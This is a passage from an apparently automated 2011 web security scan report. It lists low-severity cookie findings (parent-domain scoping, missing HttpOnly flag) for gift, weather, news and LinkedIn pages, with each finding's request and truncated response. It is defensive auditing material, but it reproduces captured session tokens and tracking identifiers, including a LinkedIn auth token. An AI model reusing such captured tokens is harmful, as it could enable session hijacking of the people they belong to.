ProductDetail_RecentlyViewed_PCR=?0&9/3/2011 6:23:53 PM?0&9/3/2011 6:24:05 PM?0&9/3/2011 6:24:33 PM?0&9/3/2011 6:25:01 PM?0&9/3/2011 6:24:49 PM?0&9/3/2011 6:25:00 PM?0&9/3/2011 6:25:19 PM?0&9/3/2011 6:26:43 PM?0&9/3/2011 6:26:58 PM?0&9/3/2011 6:27:20 PM?0&9/3/2011 6:27:30 PM?0&9/3/2011 6:27:56 PM?0&9/3/2011 6:27:14 PM?0&9/3/2011 6:27:54 PM?0&9/3/2011 6:28:09 PM?0&9/3/2011 6:28:10 PM?0&9/3/2011 6:29:21 PM?0&9/3/2011 6:29:12 PM?0&9/3/2011 6:29:04 PM?0&9/3/2011 6:29:29 PM?0&9/3/2011 6:29:35 PM?0&9/3/2011 6:30:11 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:30:11 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personalized-birthday-gifts-her-PHERBIR HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.61. http://www.personalcreations.com/personalized-business-gifts-PBIZGFT previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.personalcreations.com
Path:	/personalized-business-gifts-PBIZGFT

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:19:35 PM?0&9/3/2011 6:19:10 PM?0&9/3/2011 6:19:46 PM?0&9/3/2011 6:19:48 PM?0&9/3/2011 6:20:47 PM?0&9/3/2011 6:20:37 PM?0&9/3/2011 6:20:23 PM?0&9/3/2011 6:20:48 PM?0&9/3/2011 6:20:46 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:20:46 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personalized-business-gifts-PBIZGFT HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.62. http://www.personalcreations.com/personalized-christmas-gifts-PCHRBSL previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.personalcreations.com
Path:	/personalized-christmas-gifts-PCHRBSL

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:19:35 PM?0&9/3/2011 6:19:10 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:19:10 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personalized-christmas-gifts-PCHRBSL HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.63. http://www.personalcreations.com/personalized-communion-gifts-PCOMMUN previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.personalcreations.com
Path:	/personalized-communion-gifts-PCOMMUN

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:19:36 PM?0&9/3/2011 6:20:18 PM?0&9/3/2011 6:20:47 PM?0&9/3/2011 6:20:56 PM?0&9/3/2011 6:21:21 PM?0&9/3/2011 6:21:23 PM?0&9/3/2011 6:21:19 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:21:19 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personalized-communion-gifts-PCOMMUN HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.64. http://www.personalcreations.com/personalized-congratulations-gifts-PCONGRA previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.personalcreations.com
Path:	/personalized-congratulations-gifts-PCONGRA

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:19:35 PM?0&9/3/2011 6:19:10 PM?0&9/3/2011 6:19:46 PM?0&9/3/2011 6:19:40 PM?0&9/3/2011 6:19:52 PM?0&9/3/2011 6:19:56 PM?0&9/3/2011 6:20:33 PM?0&9/3/2011 6:20:09 PM?0&9/3/2011 6:21:18 PM?0&9/3/2011 6:21:00 PM?0&9/3/2011 6:20:59 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:20:59 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personalized-congratulations-gifts-PCONGRA HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.65. http://www.personalcreations.com/personalized-graduation-gifts-PGRADUA previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.personalcreations.com
Path:	/personalized-graduation-gifts-PGRADUA

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:19:36 PM?0&9/3/2011 6:20:18 PM?0&9/3/2011 6:20:47 PM?0&9/3/2011 6:20:56 PM?0&9/3/2011 6:21:21 PM?0&9/3/2011 6:21:23 PM?0&9/3/2011 6:21:19 PM?0&9/3/2011 6:22:03 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:22:03 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personalized-graduation-gifts-PGRADUA HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.66. http://www.personalcreations.com/personalized-halloween-clothes-PHALAPP previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.personalcreations.com
Path:	/personalized-halloween-clothes-PHALAPP

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:19:35 PM?0&9/3/2011 6:20:11 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:20:11 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personalized-halloween-clothes-PHALAPP HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.67. http://www.personalcreations.com/personalized-halloween-gifts-PHALLOW previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.personalcreations.com
Path:	/personalized-halloween-gifts-PHALLOW

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:18:53 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:18:53 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personalized-halloween-gifts-PHALLOW HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.68. http://www.personalcreations.com/personalized-halloween-treat-bags-PHALBAG previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.personalcreations.com
Path:	/personalized-halloween-treat-bags-PHALBAG

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:19:35 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:19:35 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personalized-halloween-treat-bags-PHALBAG HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.69. http://www.personalcreations.com/personalized-housewarming-gifts-PHOUSEW previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.personalcreations.com
Path:	/personalized-housewarming-gifts-PHOUSEW

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ProductDetail_RecentlyViewed_PCR=?0&9/3/2011 6:21:17 PM?0&9/3/2011 6:21:26 PM?0&9/3/2011 6:21:17 PM?0&9/3/2011 6:22:13 PM?0&9/3/2011 6:22:11 PM?0&9/3/2011 6:22:27 PM?0&9/3/2011 6:22:29 PM?0&9/3/2011 6:22:58 PM?0&9/3/2011 6:22:53 PM?0&9/3/2011 6:22:44 PM?0&9/3/2011 6:23:35 PM?0&9/3/2011 6:23:24 PM?0&9/3/2011 6:23:47 PM?0&9/3/2011 6:24:04 PM?0&9/3/2011 6:23:35 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:23:35 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personalized-housewarming-gifts-PHOUSEW HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.70. http://www.personalcreations.com/personalized-pet-gifts-PPETBSL previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.personalcreations.com
Path:	/personalized-pet-gifts-PPETBSL

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ProductDetail_RecentlyViewed_PCR=?0&9/3/2011 6:23:53 PM?0&9/3/2011 6:24:05 PM?0&9/3/2011 6:24:33 PM?0&9/3/2011 6:25:01 PM?0&9/3/2011 6:24:49 PM?0&9/3/2011 6:25:00 PM?0&9/3/2011 6:25:19 PM?0&9/3/2011 6:26:43 PM?0&9/3/2011 6:26:58 PM?0&9/3/2011 6:27:20 PM?0&9/3/2011 6:27:30 PM?0&9/3/2011 6:27:56 PM?0&9/3/2011 6:27:14 PM?0&9/3/2011 6:27:54 PM?0&9/3/2011 6:28:09 PM?0&9/3/2011 6:28:10 PM?0&9/3/2011 6:29:21 PM?0&9/3/2011 6:29:12 PM?0&9/3/2011 6:29:04 PM?0&9/3/2011 6:29:29 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:29:29 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personalized-pet-gifts-PPETBSL HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.71. http://www.personalcreations.com/personalized-romantic-gifts-PLARBSL previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.personalcreations.com
Path:	/personalized-romantic-gifts-PLARBSL

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ProductDetail_RecentlyViewed_PCR=?0&9/3/2011 6:23:53 PM?0&9/3/2011 6:24:05 PM?0&9/3/2011 6:24:33 PM?0&9/3/2011 6:25:01 PM?0&9/3/2011 6:24:49 PM?0&9/3/2011 6:25:00 PM?0&9/3/2011 6:25:19 PM?0&9/3/2011 6:26:43 PM?0&9/3/2011 6:26:58 PM?0&9/3/2011 6:27:20 PM?0&9/3/2011 6:27:30 PM?0&9/3/2011 6:27:56 PM?0&9/3/2011 6:27:25 PM?0&9/3/2011 6:27:59 PM?0&9/3/2011 6:28:09 PM?0&9/3/2011 6:28:46 PM?0&9/3/2011 6:28:53 PM?0&9/3/2011 6:29:27 PM?0&9/3/2011 6:29:17 PM?0&9/3/2011 6:29:16 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:29:16 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personalized-romantic-gifts-PLARBSL HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.72. http://www.wunderground.com/auto/sacbee/CA/Sacramento.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wunderground.com
Path:	/auto/sacbee/CA/Sacramento.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ASC=1315098655:2; path=/; expires=Fri, 01-Jan-2020 00:00:00 GMT; domain=.wunderground.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /auto/sacbee/CA/Sacramento.html?threeday=1&width=316 HTTP/1.1
Host: www.wunderground.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dottag.42=1

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:10:55 GMT
Server: Apache/1.3.33 (Unix) PHP/4.4.0
X-CreationTime: 0.287
Set-Cookie: ASC=1315098655:2; path=/; expires=Fri, 01-Jan-2020 00:00:00 GMT; domain=.wunderground.com
Connection: close
Content-Type: text/html
Content-Length: 1120

<html>
<head>
   <style type="text/css">
       body { font-family: Arial,Helvetica,sans-serif; font-size: 12px; }
       td { font-size: 12px; }
   </style>
</head>
<body>
       <div style="width: 316px;">
       <div cla
...[SNIP]...

12. Cookie without HttpOnly flag set previous next
There are 79 instances of this issue:

http://content.usatoday.com/asp/uas3/uasSignedOut.htm
http://trc.taboolasyndication.com/reuters/trc/2/json
https://www.linkedin.com/secure/login
http://www.personalcreations.com/
http://www.personalcreations.com/apparel-gifts-her-PHERAPP
http://www.personalcreations.com/grandparents-day-gifts-PGDPDAY
http://www.personalcreations.com/halloween-home-decorations-PHALHOM
http://www.personalcreations.com/just-because-gifts-PJBEBSL
http://www.personalcreations.com/personalized-anniversary-gifts-PANNBSL
http://www.personalcreations.com/personalized-back-to-school-gifts-PBKDB2S
http://www.personalcreations.com/personalized-birthday-gifts-PBIRBSL
http://www.personalcreations.com/personalized-birthday-gifts-her-PHERBIR
http://www.personalcreations.com/personalized-business-gifts-PBIZGFT
http://www.personalcreations.com/personalized-christmas-gifts-PCHRBSL
http://www.personalcreations.com/personalized-communion-gifts-PCOMMUN
http://www.personalcreations.com/personalized-congratulations-gifts-PCONGRA
http://www.personalcreations.com/personalized-graduation-gifts-PGRADUA
http://www.personalcreations.com/personalized-halloween-clothes-PHALAPP
http://www.personalcreations.com/personalized-halloween-gifts-PHALLOW
http://www.personalcreations.com/personalized-halloween-treat-bags-PHALBAG
http://www.personalcreations.com/personalized-housewarming-gifts-PHOUSEW
http://www.personalcreations.com/personalized-pet-gifts-PPETBSL
http://www.personalcreations.com/personalized-romantic-gifts-PLARBSL
http://www.publish2.com/newsgroups/state-worker.js
http://ad.afy11.net/ad
http://ad.turn.com/server/ads.js
http://ad.yieldmanager.com/pixel
http://adadvisor.net/adscores/g.js
http://ads.adbrite.com/adserver/vdi/742697
http://ads.revsci.net/adserver/ako
http://ads.revsci.net/adserver/ako
http://ads.revsci.net/adserver/ako
http://b.scorecardresearch.com/b
http://b.scorecardresearch.com/p
http://b.scorecardresearch.com/r
http://bh.contextweb.com/bh/rtset
http://c.casalemedia.com/c/1/1/89733/http://altfarm.mediaplex.com/ad/ck/10105-135615-9432-62
http://ce.lijit.com/merge
http://cm.npc-mcclatchy.overture.com/js_1_0/
http://community.sprint.com/baw/community/buzzaboutwireless
http://community.sprint.com/baw/community/buzzaboutwireless/customer-service/sprintdotcom-support
http://community.sprint.com/baw/community/sprintblogs
http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/2925993182975414771
http://d.audienceiq.com/r/dm/mkt/73/mpid//mpuid/2925993182975414771
http://d.mediabrandsww.com/r/dm/mkt/3/mpid//mpuid/2925993182975414771
http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/2925993182975414771
http://i.casalemedia.com/imp.gif
http://image2.pubmatic.com/AdServer/Pug
http://imp.fetchback.com/serve/fb/adtag.js
http://imp.fetchback.com/serve/fb/imp
http://leadback.advertising.com/adcedge/lb
http://nmsacramento.112.2o7.net/b/ss/nmsacramento/1/H.20.3/s83257504000794
http://optimized-by.rubiconproject.com/a/4462/5032/7102-15.js
http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html
http://pix04.revsci.net/D08734/a1/0/0/0.gif
http://pix04.revsci.net/D08734/a1/0/3/0.js
http://pix04.revsci.net/F09828/a4/0/0/0.js
http://pix04.revsci.net/I07714/b3/0/3/1008211/304415100.js
http://pix04.revsci.net/J06575/a4/0/0/pcx.js
http://pix04.revsci.net/J06575/b3/0/3/1008211/66697159.js
http://pixel.mathtag.com/sync
http://r.casalemedia.com/rum
http://r.openx.net/set
http://r.turn.com/r/bd
http://r.turn.com/r/beacon
http://r.turn.com/r/cms/id/0/ddc/1/pid/43/uid/
http://rma-api.gravity.com/v1/beacons/initialize
http://rt.legolas-media.com/lgrt
http://sitelife.usatoday.com/ver1.0/Content/direct/scripts/DirectProxyFast.js
http://statse.webtrendslive.com/dcsncwimc10000kzgoor3wv9x_3f2v/dcs.gif
http://sync.adap.tv/sync
http://sync.mathtag.com/sync
http://syndication.mmismm.com/tntwo.php
http://tacoda.at.atwola.com/rtx/r.js
http://tags.bluekai.com/site/4195
http://tr.adinterax.com/re/mcclatchyinteractive%2CSAC_ccul_110425_brand_exp%2CC%3DSAC_CCUL%2CP%3DSAC%2CK%3D696749/0.17714067571796477/0/in%2Cti/ti.gif
http://tu.connect.wunderloop.net/TU/1/1/1/
http://www.bizographics.com/collect/
http://www.wunderground.com/auto/sacbee/CA/Sacramento.html

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

12.1. http://content.usatoday.com/asp/uas3/uasSignedOut.htm previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://content.usatoday.com
Path:	/asp/uas3/uasSignedOut.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDSQQQADDA=OIMLBDFBJFJKOFFOMKLADCDM; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /asp/uas3/uasSignedOut.htm HTTP/1.1
Host: content.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowserSniffer=navigator.type%3D4%3B%0Anavigator.version%3D535.1%3B%0Anavigator.os%3D%22undefined%22%3B%0Anavigator.jsVersion%3D1.6%3B%0Anavigator.vbScriptEnabled%3Dfalse%3B%0A; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; rsi_seg=; rsi_segs=J06575_10396; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; ASPSESSIONIDASQTAAAC=EPNJMMPAKJOIAFKDGAKKCMKG; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; __qca=P0-1950655009-1315096993908; s_cc=true; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Ftopics; s_ppv=0; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDSQQQADDA=OIMLBDFBJFJKOFFOMKLADCDM; path=/
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Sun, 04 Sep 2011 00:52:09 GMT
Content-Length: 388

<div class="uasPageElement uasSignedOut">
<span class="uasGreeting">Join USA TODAY  </span>
<span class="uasPageControls">
<a class="uasSignIn" href="#SignIn">Sign in</a>
|
<
...[SNIP]...

12.2. http://trc.taboolasyndication.com/reuters/trc/2/json previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://trc.taboolasyndication.com
Path:	/reuters/trc/2/json

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

taboola_session_id=v1_cf5b371b2ea2c82fafb75969374381dc_ae7f02b7-d8fc-4e74-9744-efca878a3ea7_1315097030_1315098063;Path=/reuters/
JSESSIONID=.prod2-f7;Path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /reuters/trc/2/json?tim=19%3A48%3A52.780&publisher=reuters&pv=2&list-size=3&list-id=rbox-t2v&id=500&uim=article&intent=s&uip=article&external=http%3A%2F%2Fwww.reuters.com%2Farticle%2F2011%2F09%2F03%2Fus-weather-football-idUSTRE78222D20110903&llvl=1&item-id=USTRE78222D20110904&item-type=text&item-url=http%3A%2F%2Fwww.reuters.com%2Farticle%2F2011%2F09%2F04%2Fus-weather-football-idUSTRE78222D20110904&page-id=7ec1fa180194eff20c8fb72aa34c5e7764c06279&sd=v1_cf5b371b2ea2c82fafb75969374381dc_ae7f02b7-d8fc-4e74-9744-efca878a3ea7_1315097030_1315097030&uid=ae7f02b7-d8fc-4e74-9744-efca878a3ea7&cv=4-8-2-1-48560-3339640&uiv=default&cb=TRC.callbacks.recommendations_1 HTTP/1.1
Host: trc.taboolasyndication.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: taboola_session_id=v1_cf5b371b2ea2c82fafb75969374381dc_ae7f02b7-d8fc-4e74-9744-efca878a3ea7_1315097030_1315097030; taboola_wv=; taboola_user_id=ae7f02b7-d8fc-4e74-9744-efca878a3ea7; JSESSIONID=.prod2-f3

Response

HTTP/1.1 200 OK
Server: nginx/1.0.0
Date: Sun, 04 Sep 2011 01:01:03 GMT
Content-Type: text/plain; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: policyref="http://trc.taboolasyndication.com/p3p.xml", CP="NOI DSP COR LAW NID CURa ADMa DEVa PSAa PSDa OUR BUS IND UNI COM NAV INT DEM"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: taboola_session_id=v1_cf5b371b2ea2c82fafb75969374381dc_ae7f02b7-d8fc-4e74-9744-efca878a3ea7_1315097030_1315098063;Path=/reuters/
Set-Cookie: JSESSIONID=.prod2-f7;Path=/
Set-Cookie: taboola_wv=;Path=/reuters/;Expires=Mon, 03-Sep-12 01:01:03 GMT
Content-Length: 4005

TRC.callbacks.recommendations_1({"trc":{"req":"ebe18cbed15d8f4b449e571f68fc0689","session-id":"cf5b371b2ea2c82fafb75969374381dc","session-data":"v1_cf5b371b2ea2c82fafb75969374381dc_ae7f02b7-d8fc-4e74-
...[SNIP]...

12.3. https://www.linkedin.com/secure/login previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.linkedin.com
Path:	/secure/login

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

leo_auth_token="GST:92Y5C7-Duxr1zGVs1Wv1YxDhPErhhqpepcYFrtwDfIrhAIVsQxwMUh:1315099155:0c843f0a96a8006c044aa7d63d7ac676a0c1e9e0"; Version=1; Max-Age=1799; Expires=Sun, 04-Sep-2011 01:49:14 GMT; Path=/
sl="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /secure/login HTTP/1.1
Host: www.linkedin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

